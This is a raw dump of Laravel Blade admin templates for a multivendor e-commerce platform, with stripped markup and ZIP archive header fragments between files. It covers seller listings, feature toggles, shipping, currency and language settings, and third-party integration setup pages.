    @if ($shop->verification_status != 1 && $shop->verification_info != null) @endif
    {{ translate('User Info') }}

    {{ translate('Name') }} : {{ $shop->user->name }}

    {{translate('Email')}} {{ $shop->user->email }}

    {{translate('Address')}} {{ $shop->user->address }}

    {{translate('Phone')}} {{ $shop->user->phone }}


    {{ translate('Shop Info') }}

    {{translate('Shop Name')}} {{ $shop->user->shop->name }}

    {{translate('Address')}} {{ $shop->address }}

    {{ translate('Verification Info') }}
    @if ($shop->verification_info != null) @foreach (json_decode($shop->verification_info) as $key => $info) @if ($info->type == 'text' || $info->type == 'select' || $info->type == 'radio') @elseif ($info->type == 'multi_select') @elseif ($info->type == 'file') @endif @endforeach
    {{ $info->label }}{{ $info->value }} {{ implode(', ', json_decode($info->value)) }} {{translate('Click here')}}
    @endif @if ($shop->verification_status != 1 && $shop->verification_info != null) @endif
    @endsection PK�N]�5����7views/backend/sellers/verification_info_modal.blade.phpnu�[���PK�N]=�pVSqSq0views/backend/sellers/all_seller_table.blade.phpnu�[��� @php $route = Route::currentRouteName() == 'sellers.index' ? 'all_seller_route' : 'seller_rating_followers'; @endphp
    @if(auth()->user()->can('delete_seller') && ($route == 'all_seller_route')) @else @endif @if($route == 'all_seller_route') @else @endif @forelse($shops as $key => $shop) @if($route == 'all_seller_route') @else @endif @empty @endforelse
    #{{ translate('Logo') }} {{ translate('Shop Info') }} {{ translate('Contact Details') }} {{ translate('Business Info') }}{{ translate('Verification') }} {{ translate('Verification Approval') }}{{ translate('Rating') }} {{ translate('Followers') }} {{ translate('Custom Followers') }}{{ translate('Options') }}
    @if(auth()->user()->can('delete_seller') && ($route == 'all_seller_route'))
    @else
    {{ ($key+1) + ($shops->currentPage() - 1)*$shops->perPage() }}
    @endif
    Logo
    {{ translate('Shop Name') }}

    @if ($route == 'all_seller_route') @if($shop->user->banned == 1) @elseif($shop->user->is_suspicious == 1) @else @endif @endif {{ $shop->name }}

    {{ translate('Owner Name') }}

    {{ $shop->user->name ?? '-' }}

    {{ translate('Phone') }}

    {{ $shop->user->phone ?? '-' }}

    {{ translate('Email') }}

    {{ $shop->user->email ?? '-' }}

    @if($route == 'all_seller_route')
    {{ translate('Products') }}

    {{ $shop->user->products->count() }}

    {{ translate('Due to seller') }}

    @if ($shop->admin_to_pay >= 0) {{ single_price($shop->admin_to_pay) }} @else {{ single_price(abs($shop->admin_to_pay)) }} ({{ translate('Due to Admin') }}) @endif

    @if(get_setting('seller_commission_type') == 'seller_based')
    {{ translate('Commission') }}

    {{ $shop->commission_percentage }}%

    @endif @else
    {{ translate('Registration Date') }}

    {{ $shop->created_at ? $shop->created_at->format('Y-m-d') : '-' }}

    {{ translate('Seller Type') }}

    @if($shop->user->banned) {{ translate('Banned') }} @elseif($shop->user->is_suspicious) {{ translate('Suspicious') }} @else {{ translate('Regular') }} @endif

    @endif
    {{ translate('Email') }}
    @if($shop->user->email_verified_at != null) {{ translate('Verified') }} @else {{ translate('Unverified') }} @endif
    {{ translate('Seller') }}
    @if ($shop->verification_status != 1 && $shop->verification_info != null) {{ translate('Applied') }} {{ translate('View Details') }} @elseif($shop->verification_status == 1 && $shop->verification_info != null) {{ translate('Verified') }} {{ translate('View Details') }} @elseif($shop->verification_status == 1 && $shop->verification_info == null) {{ translate('Verified (Admin)') }} @else {{ translate('Not Applied') }} @endif
    @for ($i=0; $i < $shop->rating; $i++) @endfor @for ($i=0; $i < 5-$shop->rating; $i++) @endfor

    {{ $shop->rating }}{{ translate('out of') }} 5.0

    {{ $shop->followers()->count() }}

    {{ translate('Total Followers') }}

    {{ $shop->custom_followers }}

    @if(auth()->user()->can('edit_seller_custom_followers')) {{ translate('Edit') }} @endif
    {{ translate('No Shops found!') }}
    @if($shops->hasPages()) @endif
    PK�N]�Gh�O/O/4views/backend/sellers/pending_seller_table.blade.phpnu�[���
    @if(auth()->user()->can('delete_seller')) @else @endif @forelse($shops as $key => $shop) @empty @endforelse
    #{{ translate('Logo') }} {{ translate('Shop Info') }} {{ translate('Contact Details') }} {{ translate('Registration Info') }} {{ translate('Access Approval') }} {{ translate('Options') }}
    @if(auth()->user()->can('delete_seller'))
    @else
    {{ ($key+1) + ($shops->currentPage() - 1)*$shops->perPage() }}
    @endif
    Logo
    {{ translate('Shop Name') }}

    {{ $shop->name }}

    {{ translate('Owner Name') }}

    {{ $shop->user->name ?? '-' }}

    {{ translate('Phone') }}

    {{ $shop->user->phone ?? '-' }}

    {{ translate('Email') }}

    {{ $shop->user->email ?? '-' }}

    {{ translate('Registration Date') }}

    {{ $shop->created_at ? $shop->created_at->format('Y-m-d H:i:s') : '-' }}

    {{ translate('Status') }}
    @if(addon_is_activated('portfolio_system') != 1) {{ translate('Pending') }} @else @if ($shop->verification_status != 1 && $shop->business_info != null) @php $verification_docs = json_decode($shop->business_info); @endphp {{ translate('Submitted') }}
    {{ translate('View Info') }} @elseif ($shop->verification_status == 1) {{ translate('Verified') }} @else {{ translate('Not Submitted') }} @endif @endif
    {{ translate('No Shops found!') }}
    @if($shops->hasPages()) @endif
    PK�N]x�J���7views/backend/setup_configurations/activation.blade.phpnu�[���@extends('backend.layouts.app') @section('content')

    {{ translate('Feature Activation') }}

    {{ translate('Customize how the business operates') }}
    {{ translate('INFRASTRUCTURE') }}
    Icon
    {{ translate('HTTPS Activation') }}
    {{ translate('Enable this to force the website to load over a secure HTTPS connection.') }}
    Icon
    {{ translate('Maintenance Mode') }}
    {{ translate('Enable this to temporarily disable the website and show a maintenance message.') }}
    Icon
    {{ translate('Disable Image Encoding') }}
    {{ translate('Enable this to disable image encoding and skip image optimization.') }}
    {{ translate('SELLER & VENDOR') }}
    Icon
    {{ translate('Vendor / Multivendor System') }}
    {{ translate('Allow third-party sellers to list and sell on your platform.') }}
    Icon
    {{ translate('Admin Approval for Seller Product') }}
    {{ translate('Require admin review before seller products go live.') }}
    Icon
    {{ translate('Seller Order Management') }}
    {{ translate('Let admin control and manage seller orders.') }}
    Icon
    {{ translate('Seller Email Verification') }}
    {{ translate('Verify seller email while registration.') }}
    Icon
    {{ translate('Digital Products for Sellers') }}
    {{ translate('Allow sellers to list and sell downloadable digital goods.') }}
    Icon
    {{ translate('Seller External Product Links') }}
    {{ translate('Allow sellers to add external URLs to their product listings.') }}
    @if (addon_is_activated('wholesale'))
    Icon
    {{ translate('Wholesale (B2B) for Sellers') }}
    {{ translate('Enable to allow seller to set bulk pricing and wholesale orders for business buyers.') }}
    @endif @if (addon_is_activated('auction'))
    Icon
    {{ translate('Auction Products for Sellers') }}
    {{ translate('Let sellers list products for time-limited bidding auctions.') }}
    @endif
    Icon
    {{ translate('Classified Products') }}
    {{ translate('Enable classified-style listings with buyer–seller direct contact.') }}
    {{ translate('Customer & checkout') }}
    Icon
    {{ translate('Customer Registration Verification') }}
    {{ translate('Require email or OTP verification on new customer sign-up.') }}
    Icon
    {{ translate('Guest Checkout') }}
    {{ translate('Allow customers to complete purchase without registering.') }}
    Icon
    {{ translate('Pickup Point') }}
    {{ translate('Let customers select a local pickup location at checkout.') }}
    Icon
    {{ translate('Billing Address at Checkout') }}
    {{ translate('Make billing address a required field during checkout.') }}
    Icon
    {{ translate('Last Viewed Products') }}
    {{ translate('Show customers their recently browsed product history.') }}
    Icon
    {{ translate('Product Query (Q&A)') }}
    {{ translate('Let customers ask questions directly on product pages.') }}
    Icon
    {{ translate('Customer-Seller Conversation') }}
    {{ translate('Enable in-platform messaging between buyers and sellers.') }}
    Icon
    {{ translate('Floating Action Buttons') }}
    {{ translate('Show quick-action buttons (categories, flash deals etc) floating on the storefront.') }}
    {{ translate('Promotions & loyalty') }}
    Icon
    {{ translate('Coupon System') }}
    {{ translate('Enable discount codes and coupon campaigns for customers.') }}
    Icon
    {{ translate('Newsletter Subscription') }}
    {{ translate('Collect customer emails for marketing campaigns.') }}
    Icon
    {{ translate('Wallet system') }}
    {{ translate('Give customers a digital wallet for store credits and refunds.') }}
    {{ translate('Security & authentication') }}
    Icon
    {{ translate('Email Verification') }}
    {{ translate('Send a verification link to confirm new account emails.') }} {{ translate('Requires SMTP configuration') }}
    Icon
    {{ translate('Facebook Login') }}
    {{ translate('Let customers sign in using their Facebook account') }} {{ translate('Requires Facebook app credentials') }}
    Icon
    {{ translate('Google Login') }}
    {{ translate('Let customers sign in using their Google account.') }} {{ translate(' Requires Google OAuth credentials') }}
    Icon
    {{ translate('Twitter / X login') }}
    {{ translate('Let customers sign in using their Twitter/X account.') }} {{ translate('Requires Twitter app credential') }}
    Icon
    {{ translate('Apple Login') }}
    {{ translate('Let customers sign in using their Apple ID.') }} {{ translate('Requires Apple developer credentials') }}
    @endsection @section('script') @endsectionPK�N]���9ww7views/backend/setup_configurations/areas/edit.blade.phpnu�[���@extends('backend.layouts.app') @section('content')
    {{ translate('Area Information') }}
    @method('PATCH') @csrf
    @if(get_setting('has_state') == 1)
    @else
    @endif
    @endsection @section('script') @endsection PK�N]���X<X<8views/backend/setup_configurations/areas/index.blade.phpnu�[���@extends('backend.layouts.app') @section('content')

    {{translate('All areas')}}

    {{ translate('Area') }}
    @if (get_setting('has_state') == 1)
    @else
    @endif
    @foreach($areas as $key => $area) @endforeach
    # {{translate('Name')}} {{translate('City')}} {{translate('Area Wise Shipping Cost')}} {{translate('Show/Hide')}} {{translate('Options')}}
    {{ ($key+1) + ($areas->currentPage() - 1) * $areas->perPage() }} {{ $area->getTranslation('name') }} {{ $area->city->name }} {{ single_price($area->cost) }}
    {{ $areas->appends(request()->input())->links() }}
    {{ translate('Add New Area') }}
    @csrf
    @if(get_setting('has_state') == 1)
    @else
    @endif
    @endsection @section('modal') @include('modals.delete_modal') @endsection @section('script') @endsection PK�N]���m m <views/backend/setup_configurations/box_size/create.blade.phpnu�[���@extends('backend.layouts.app') @section('content')
    {{ translate('Box Size Information') }}
    @csrf
    @endsectionPK�N]t�wh h :views/backend/setup_configurations/box_size/edit.blade.phpnu�[���@extends('backend.layouts.app') @section('content')
    {{ translate('Edit Box Size Information') }}
    @csrf
    @endsection PK�N]�L.L.;views/backend/setup_configurations/box_size/index.blade.phpnu�[���@extends('backend.layouts.app') @section('content') @php CoreComponentRepository::instantiateShopRepository(); CoreComponentRepository::initializeCache(); @endphp
    @can('shipping_box_size_create') {{ translate('Add New Box Size') }} @endif
    @endsection @section('modal') @include('modals.delete_modal') @endsection @section('script') @endsection PK�N] Og..;views/backend/setup_configurations/box_size/table.blade.phpnu�[���
    @if (auth()->user()->can('shipping_box_size_delete')) @else @endif @canany(['shipping_box_size_edit','shipping_box_size_delete']) @endcanany @foreach ($shipping_box_sizes as $key => $shipping_box_size) @canany(['shipping_box_size_edit','shipping_box_size_delete']) @endcanany @endforeach
    # {{ translate('Courier Type') }} {{ translate('Length') }} {{ translate('Breadth') }} {{ translate('Height') }} {{ translate('Options') }}
    @if (auth()->user()->can('shipping_box_size_delete'))
    @else
    {{ $key + 1 + ($shipping_box_sizes->currentPage() - 1) * $shipping_box_sizes->perPage() }}
    @endif
    {{ ucfirst( $shipping_box_size->courier_type )}}
    {{ $shipping_box_size->length }} cm
    {{ $shipping_box_size->breadth }} cm
    {{ $shipping_box_size->height }} cm
    {{ $shipping_box_sizes->appends(request()->input())->links() }}
    PK�N]�_v���>views/backend/setup_configurations/business_settings.blade.phpnu�[���@extends('backend.layouts.app') @section('content') @endsectionPK�N]�{�+�:�:<views/backend/setup_configurations/carriers/create.blade.phpnu�[���@extends('backend.layouts.app') @section('content')

    {{ translate('Add New Carrier') }}

    {{ translate('Carrier Information') }}
    @csrf
    {{ translate('Browse') }}
    {{ translate('Choose File') }}
    {{-- carrier Price Range form --}}


    @foreach ($zones as $zone) @endforeach
    >=
    <
    {{ $zone->name }}
    $
    @endsection @section('script') @endsection PK�N]Ԕ b&K&K:views/backend/setup_configurations/carriers/edit.blade.phpnu�[���@extends('backend.layouts.app') @section('content')

    {{ translate('Carrier Informations') }}

    {{ translate('Carrier Information') }}
    @csrf
    {{ translate('Browse')}}
    {{ translate('Choose File') }}
    {{-- carrier Price Range form --}}

    @foreach($carrier->carrier_ranges as $carrier_range) @endforeach @if (count($carrier->carrier_ranges)==0) @endif @foreach($carrier->carrier_ranges as $carrier_range) @endforeach @if (count($carrier->carrier_ranges)==0) @endif @foreach ($zones as $key => $zone) @php $selected_zones = $carrier->carrier_range_prices->unique('zone_id')->pluck('zone_id')->toArray(); @endphp @foreach($carrier->carrier_ranges as $key => $carrier_range) @php $carrier_range_price = $carrier_range->carrier_range_prices->where('zone_id',$zone->id)->first(); @endphp @endforeach @if (count($carrier->carrier_ranges)==0) @endif @endforeach @foreach($carrier->carrier_ranges as $key => $carrier_range) @endforeach
    >=
    <
    {{ $zone->name }} id, $selected_zones)) checked @endif>
    $
    id, $selected_zones)) disabled @endif required>
    $
    @if($key == 0) @continue @endif
    @endsection @section('script') @endsectionPK�N]����;views/backend/setup_configurations/carriers/index.blade.phpnu�[���@extends('backend.layouts.app') @section('content')

    {{ translate('All Carriers') }}

    {{ translate('Carriers') }}
    @foreach ($carriers as $key => $carrier) @endforeach
    # {{ translate('Logo') }} {{ translate('Name') }} {{ translate('Transit Time') }} {{ translate('Status') }} {{ translate('Options') }}
    {{ $carriers->firstItem() + $key }} {{translate('Carrier')}} {{ $carrier->name }} {{ $carrier->transit_time }}
    {{ $carriers->appends(request()->input())->links() }}
    @endsection @section('modal') @include('modals.delete_modal') @endsection @section('script') @endsection PK�N]:views/backend/setup_configurations/cities/create.blade.phpnu�[���PK�N]�$ $ 8views/backend/setup_configurations/cities/edit.blade.phpnu�[���@extends('backend.layouts.app') @section('content')
    {{translate('City Information')}}
    @csrf
    @if (get_setting('has_state') == 1)
    @else
    @endif
    @endsection PK�N]�l<--9views/backend/setup_configurations/cities/index.blade.phpnu�[���@extends('backend.layouts.app') @section('content')

    {{translate('All cities')}}

    {{ translate('Cities') }}
    @if (get_setting('has_state') == 1)
    @else
    @endif
    @if (get_setting('has_state') == 1) @endif @foreach($cities as $key => $city) @if (get_setting('has_state') == 1) @endif @endforeach
    # {{translate('Name')}}{{translate('State')}}{{translate('Country')}} {{translate('Area Wise Shipping Cost')}} {{translate('Show/Hide')}} {{translate('Options')}}
    {{ ($key+1) + ($cities->currentPage() - 1) * $cities->perPage() }} {{ $city->getTranslation('name') }}{{ $city->state->name ?? ''}}{{ $city->country->name ?? '' }} {{ single_price($city->cost) }}
    {{ $cities->appends(request()->input())->links() }}
    {{ translate('Add New city') }}
    @csrf
    @if (get_setting('has_state') == 1)
    @else
    @endif
    @endsection @section('modal') @include('modals.delete_modal') @endsection @section('script') @endsection PK�N]C�/wMM<views/backend/setup_configurations/countries/index.blade.phpnu�[���@extends('backend.layouts.app') @section('content')
    {{ translate('Countries') }}
    @foreach($countries as $key => $country) @endforeach
    # {{translate('Name')}} {{translate('Code')}} {{translate('Show/Hide')}}
    {{ ($key+1) + ($countries->currentPage() - 1)*$countries->perPage() }} {{ $country->name }} {{ $country->code }}
    {{ $countries->appends(request()->input())->links() }}
    @endsection @section('modal') @endsection @section('script') @endsection PK�N]1��h��>views/backend/setup_configurations/currencies/create.blade.phpnu�[���
    @csrf
    PK�N]]#In<views/backend/setup_configurations/currencies/edit.blade.phpnu�[���
    @csrf
    PK�N]�Yu)u)=views/backend/setup_configurations/currencies/index.blade.phpnu�[���@extends('backend.layouts.app') @section('content')
    {{translate('System Default Currency')}}
    @csrf
    {{translate('Set Currency Formats')}}
    @csrf

    {{translate('All Currencies')}}

    {{ translate('All Currencies') }}
    @foreach ($currencies as $key => $currency) @endforeach
    # {{translate('Currency name')}} {{translate('Currency symbol')}} {{translate('Currency code')}} {{translate('Exchange rate')}}(1 USD = ?) {{translate('Status')}} {{translate('Options')}}
    {{ ($key+1) + ($currencies->currentPage() - 1)*$currencies->perPage() }} {{$currency->name}} {{$currency->symbol}} {{$currency->code}} {{$currency->exchange_rate}}
    {{ $currencies->appends(request()->input())->links() }}
    @endsection @section('modal') @include('modals.delete_modal') @endsection @section('script') @endsection PK�N]�x] ] Aviews/backend/setup_configurations/email_templates/edit.blade.phpnu�[���@extends('backend.layouts.app') @section('content')
    {{ translate('Edit Email Template') }}
    @csrf
    @if($emailTemplate->is_dafault_text_editable == 1) {{ translate('N.B : Do Not Change The Variables Like') }} [[ ____ ]] @else {{ translate('Content is not editable for this Email.') }} @endif
    @endsectionPK�N]�m;__Bviews/backend/setup_configurations/email_templates/index.blade.phpnu�[���@extends('backend.layouts.app') @section('content') @php CoreComponentRepository::instantiateShopRepository(); CoreComponentRepository::initializeCache(); @endphp

    {{ translate('All Email Templates') }}

    @endsection @section('script') @endsection PK�N]�-(���Bviews/backend/setup_configurations/email_templates/table.blade.phpnu�[���
    @forelse ($emails as $key => $email) @empty @endforelse
    # {{ translate('Email Type') }} {{ translate('Subject') }} {{ translate('Status') }} {{ translate('Options') }}
    {{ $key + 1 + ($emails->currentPage() - 1) * $emails->perPage() }}
    {{ translate($email->email_type)}}
    {{ $email->subject}}
    {{ translate('No Data found!') }}
    {{ $emails->appends(request()->input())->links() }}
    PK�N]`��W:views/backend/setup_configurations/facebook_chat.blade.phpnu�[���@extends('backend.layouts.app') @section('content')
    {{translate('Facebook Chat Setting')}}
    @csrf
    {{ translate('Please be carefull when you are configuring Facebook chat. For incorrect configuration you will not get messenger icon on your user-end site.') }}
    • 1. {{ translate('Login into your facebook page') }}
    • 2. {{ translate('Find the About option of your facebook page') }}.
    • 3. {{ translate('At the very bottom, you can find the “Facebook Page ID”') }}.
    • 4. {{ translate('Go to Settings of your page and find the option of "Advance Messaging"') }}.
    • 5. {{ translate('Scroll down that page and you will get "white listed domain"') }}.
    • 6. {{ translate('Set your website domain name') }}.
    @endsection PK�N]�D�ppTviews/backend/setup_configurations/facebook_configuration/facebook_comment.blade.phpnu�[���@extends('backend.layouts.app') @section('content')
    {{translate('Facebook Comment Setting')}}
    @csrf
    {{ translate('Please be carefull when you are configuring Facebook Comment. For incorrect configuration you will not get comment section on your user-end site.') }}
    • 1. {{ translate('Login into your facebook page') }}
    • 2. {{ translate('After then go to this URL https://developers.facebook.com/apps/') }}.
    • 3. {{ translate('Create Your App') }}.
    • 4. {{ translate('In Dashboard page you will get your App ID') }}.
    @endsection PK�N]��f�} } Sviews/backend/setup_configurations/facebook_configuration/pixel_analytics.blade.phpnu�[���@extends('backend.layouts.app') @section('content')
    {{ translate('Facebook Pixel Setting') }}
    @csrf
    {{ translate('Please be carefull when you are configuring Facebook pixel.') }}
    • 1. {{ translate('Log in to Facebook and go to your Ads Manager account') }}.
    • 2. {{ translate('Open the Navigation Bar and select Events Manager') }}.
    • 3. {{ translate('Copy your Pixel ID from underneath your Site Name and paste the number into Facebook Pixel ID field') }}.
    @endsection PK�N]R�|B��Nviews/backend/setup_configurations/facebook_configuration/pixel_capi.blade.phpnu�[���@extends('backend.layouts.app') @section('content')
    {{ translate('Facebook Pixel Conversation API Setting') }}
    @csrf
    {{ translate('Facebook Pixel & CAPI Setup Instructions') }}
    {{ translate('Follow these steps to set up Conversion API (CAPI):') }}
    • 1. {{ translate('Create/Get Pixel ID') }}
      • - {{ translate('Go to') }} Facebook Events Manager
      • - {{ translate('Select your pixel or create a new one') }}
      • - {{ translate('Copy the Pixel ID from the top of the page') }}
    • 2. {{ translate('Generate Access Token for CAPI') }}
      • - {{ translate('In Events Manager, go to') }} Settings → Scroll to Conversion API
      • - {{ translate('Click on') }} "Generate Access Token" {{ translate('button') }}
      • - {{ translate('Copy the generated token') }} ({{ translate('starts with EAA...') }})
      • {{ translate('Save this token immediately - you won\'t see it again!') }}
    {{ translate('Important Notes:') }}
    • {{ translate('Access tokens expire - you may need to regenerate them periodically') }}
    • {{ translate('CAPI works alongside browser pixel for better data reliability') }}
    • {{ translate('Make sure your domain is verified in Facebook Business Manager') }}
    {{ translate('Token Format Example:') }} {{ translate('EAAJjmXXfkp8BAMZCDLWDZB6ZCk4yUmMbITZBk...') }}
    @endsectionPK�N]R9�P�E�E8views/backend/setup_configurations/file_system.blade.phpnu�[���@extends('backend.layouts.app') @section('content')

    {{translate('S3 File System Credentials')}}

    @csrf

    {{translate('Backblaze File System Credentials')}}

    @csrf

    {{translate('AWS S3 File System Activation')}}

    {{translate('Backblaze File System Activation')}}

    {{translate('Local File System Activation')}}

    {{translate('Cache & Session Driver')}}

    @csrf

    {{translate('Redis Configuration (If you use redis as any of the drivers)')}}

    @csrf
    @endsection @section('script') @endsection PK�N]� /���=views/backend/setup_configurations/general_settings.blade.phpnu�[���@extends('backend.layouts.app') @section('content')

    {{translate('General Settings')}}

    @csrf
    {{ translate('Browse') }}
    {{ translate('Choose Files') }}
    {{ translate('Will be used in admin panel side menu') }}
    {{ translate('Browse') }}
    {{ translate('Choose Files') }}
    {{ translate('Will be used in Admin login page, Seller login page & Delivery Boy login page') }}
    {{ translate('Browse') }}
    {{ translate('Choose Files') }}
    @endsection PK�N]v�W��Rviews/backend/setup_configurations/google_configuration/google_analytics.blade.phpnu�[���@extends('backend.layouts.app') @section('content')
    {{translate('Google Analytics Setting')}}
    @csrf
    {{ translate('Google Analytics Setup Instructions') }}
    • 1. {{ translate('Go to') }} Google Cloud Console {{ translate('and create or select a project.') }}
    • 2. {{ translate('Navigate to APIs & Services → Library and enable') }} Google Analytics Data API.
    • 3. {{ translate('Go to APIs & Services → Credentials → Create Credentials → Service Account.') }}
    • 4. {{ translate('Create a key for the service account and download the JSON credentials file.') }}
    • 5. {{ translate('Rename the downloaded JSON file to') }} service-account-credentials.json.
    • 6. {{ translate('Upload this file manually to the following path in your server or hosting panel:') }}
      storage/app/analytics/service-account-credentials.json
    • 7. {{ translate('Add the following configuration line to your .env file. If it does not already exist, please add it manually:') }}
      ANALYTICS_SERVICE_ACCOUNT_CREDENTIALS_JSON=storage/app/analytics/service-account-credentials.json
    • 8. {{ translate('Go to') }} Google Analytics → {{ translate('Admin → Property Settings and copy the Property ID.') }}
    • 9. {{ translate('In Google Analytics Admin, go to Property Access Management and add the Service Account Email with Viewer permission.') }}
    • 10. {{ translate('Finally enter the Tracking ID and Analytics Property ID in the fields and save the settings.') }}
    {{ translate('Note:') }} {{ translate('The file name must be exactly') }} service-account-credentials.json {{ translate('and must be placed inside') }} storage/app/analytics/.
    @endsectionPK�N].� �XXQviews/backend/setup_configurations/google_configuration/google_firebase.blade.phpnu�[���@extends('backend.layouts.app') @section('content')

    {{translate('Google Firebase Setting')}}

    @csrf
    @endsection PK�N]%Q��Lviews/backend/setup_configurations/google_configuration/google_map.blade.phpnu�[���@extends('backend.layouts.app') @section('content')

    {{ translate('Google Map Setting') }}

    @csrf

    {{ translate('Google Map Configuration Notes') }}

    • 1. {{ translate('Enable Google map ') }}
    • 2. {{ translate('Set the google map API key') }}.
    • 2. {{ translate('After then you will find the google map option to set default location') }}.
    @if (get_setting('google_map') == 1)

    {{ translate('Default Location Setting') }}

    @csrf
    • Full Address:
    • Postal Code:
    • Country:
    • Latitude:
    • Longitude:
    @endif
    @endsection @section('script') @if (get_setting('google_map') == 1) @include('frontend.partials.google_map') @endif @endsection PK�N]��#hb0b0Rviews/backend/setup_configurations/google_configuration/google_recaptcha.blade.phpnu�[���@extends('backend.layouts.app') @section('content')

    {{translate('Google reCAPTCHA Setting')}}

    @csrf
    {{translate("Google reCAPTCHA v3 returns a score ranging from 0.0 to 1.0 that indicates the likelihood a request is made by a human or a bot.")}}
    How to Interpret the reCAPTCHA V3 Scores
    • 1. Score: 0.0 - 0.3 : Very likely a bot — Recommended Action: Block the request or require additional verification.
    • 2. Score: 0.3 - 0.5 : Suspicious activity — Recommended Action: Might want to require additional verification.
    • 3. Score: 0.5 - 0.7 : Possibly human — Recommended Action: Could be legitimate traffic.
    • 4. Score: 0.7 - 0.9 : Likely human — Recommended Action: Probably safe to allow.
    • 5. Score: 0.9 - 1.0 : Very likely human — Recommended Action: Definitely safe to allow.
    • 6. If Google reCAPTCHA v3 credentials have not yet been created, please register your site by visiting this link and complete the setup process.
    • Recaptcha Applicable Pages
    • @php $settings = [ 'recaptcha_admin_login' => 'Admin Login', 'recaptcha_customer_login' => 'Customer Login', 'recaptcha_customer_register' => 'Customer Registration', 'recaptcha_seller_login' => 'Seller Login', 'recaptcha_seller_register' => 'Seller Registration', 'recaptcha_seller_mail_verification' => 'Seller Mail Verification', 'recaptcha_forgot_password' => 'Forgot Password', 'recaptcha_delivery_boy_login' => 'Delivery Boy Login', 'recaptcha_contact_form' => 'Contact Us Form', ]; if (addon_is_activated('affiliate_system')) { $settings['recaptcha_affiliate_apply'] = 'Affiliate Application Form'; } @endphp @foreach($settings as $key => $label)
      @endforeach
    @endsection @section('modal') @endsection @section('script') @endsectionPK�N]���Tviews/backend/setup_configurations/google_configuration/google_tag_manager.blade.phpnu�[���@extends('backend.layouts.app') @section('content')
    {{ translate('Google Tag Manager Script') }}
    @csrf
    {{ translate('Write script with ">{{ get_setting('footer_gtm_script') }} {{ translate('Write script with
    {{ translate('Google Tag Manager Setup Instructions') }}
    • 1. {{ translate('Go to') }} Google Tag Manager {{ translate('and sign in with your Google account.') }}
    • 2. {{ translate('Click "Create Account" and fill in:') }}
      • - {{ translate('Account Name: Your company name') }}
      • - {{ translate('Country: Your country') }}
      • - {{ translate('Container Name: Your website name') }}
      • - {{ translate('Target Platform: Web') }}
    • 3. {{ translate('After creating container, you will see the installation code snippet.') }}
    • 4. {{ translate('Copy the first') }} <script> {{ translate('code and paste it in the') }} "Header script" {{ translate('field above.') }}
    • 5. {{ translate('Copy the second') }} <noscript> {{ translate('code and paste it in the') }} "Footer GTM script" {{ translate('field above.') }}
    {{ translate('Important:') }} {{ translate('Make sure to include both scripts. The header script must be placed as high in the as possible, and the footer script immediately after the opening tag.') }}
    {{ translate('Example GTM ID:') }} {{ translate('GTM-XXXXXXX (appears in your script)') }}
    @endsectionPK�N]iQ�m m Fviews/backend/setup_configurations/languages/app_translation.blade.phpnu�[���@extends('backend.layouts.app') @section('content')
    {{ $language->name }}
    @csrf
    @foreach ($lang_keys as $key => $translation) @endforeach
    # {{translate('Key')}} {{translate('Default Value')}} {{translate('Translated Value')}}
    {{ ($key+1) + ($lang_keys->currentPage() - 1)*$lang_keys->perPage() }} {{ $translation->lang_key }} {{ $translation->lang_value }} app_lang_code)->where('lang_key', $translation->lang_key)->latest()->first()) != null) value="{{ $traslate_lang->lang_value }}" @endif>
    {{ $lang_keys->appends(request()->input())->links() }}
    @endsection @section('script') @endsection PK�N]���Z Z =views/backend/setup_configurations/languages/create.blade.phpnu�[���@extends('backend.layouts.app') @section('content')
    {{translate('Language Information')}}
    @csrf
    @php $languagesArray = \App\Models\Language::pluck('code')->toarray(); @endphp
    {{ translate("Links for ISO 639-1 codes")}}
    @endsection PK�N]Aë@��;views/backend/setup_configurations/languages/edit.blade.phpnu�[���@extends('backend.layouts.app') @section('content')
    {{translate('Language Information')}}
    {{translate('update Language Info')}}
    @csrf
    @php $languagesArray = \App\Models\Language::pluck('code')->toarray(); if (($key = array_search($language->code, $languagesArray)) !== false) { unset($languagesArray[$key]); } @endphp
    {{ translate("Links for ISO 639-1 codes")}}
    @endsection PK�N]��Pf++<views/backend/setup_configurations/languages/index.blade.phpnu�[���@extends('backend.layouts.app') @section('content')
    {{ translate('Default Language') }}
    @csrf
    {{ translate('Import App Translations') }}
    @csrf
    Language Settings Instructions
    • To create a new language, click Add New Language.
    • Enter the Language Name, Language Code (short form), and Flutter App Lang Code.
    • Click Save. The page will redirect to the language listing page.
    • You can select any language from the list as the System Default Language and click Save.
    • To import app translation files, select the file and click Import.
    Translation Settings Instructions
    • Click the “Translation” option next to the language you want to edit.
    • On the Translation page, “Translate By Google” button to automatically translate your website content.
    • To sync translations for the mobile app, click “Sync Translation For App”.
    • To export the translation file, click “Export arb File”.
    • To manually update any translation value, edit the value fields and click Save.
    • To copy all keys into the value fields, click “Copy Translations”, then click Save.
    • Google Translate won't override your custom translations
    {{translate('Language')}}
    @php $i = 1; @endphp @foreach ($languages as $key => $language) @php $i++; @endphp @endforeach
    # {{translate('Name')}} {{translate('Code')}} {{translate('Flutter App Lang Code')}} {{translate('RTL')}} {{translate('Status')}} {{translate('Options')}}
    {{ ($key+1) + ($languages->currentPage() - 1)*$languages->perPage() }} {{ $language->name }} {{ $language->code }} {{ $language->app_lang_code }} @if($language->code != 'en') @endif
    {{ $languages->appends(request()->input())->links() }}
    @endsection @section('modal') @include('modals.delete_modal') @endsection @section('script') @endsection PK�N]Xn�#ddDviews/backend/setup_configurations/languages/language_view.blade.phpnu�[���@extends('backend.layouts.app') @section('content')

    {{translate('Set Translations')}}

    @if($language->code != 'en') @endif {{ translate('Sync Translation For App') }} {{ translate('Export arb File') }}
    Please wait until the Google translation process is complete. It may take some time, so do not close the tab during this process.
    {{ $language->name }}
    @csrf
    @foreach ($lang_keys as $key => $translation) @endforeach
    # {{translate('Key')}} {{translate('Value')}}
    {{ ($key+1) + ($lang_keys->currentPage() - 1)*$lang_keys->perPage() }} {{ $translation->lang_value }} code)->where('lang_key', $translation->lang_key)->latest()->first()) != null) value="{{ $traslate_lang->lang_value }}" @endif>
    {{ $lang_keys->appends(request()->input())->links() }}
    @endsection @section('script') @endsection PK�N]Fviews/backend/setup_configurations/order_configuration/index.blade.phpnu�[���PK�N]��=��Aviews/backend/setup_configurations/payment_method/index.blade.phpnu�[��� @extends('backend.layouts.app') @section('content')
    @foreach ($payment_methods as $payment_method)
    {{ ucfirst(translate($payment_method->name)) }}
    @include('backend.setup_configurations.payment_method.partials.'.$payment_method->name)
    @endforeach
    {{ translate('Cash Payment') }}
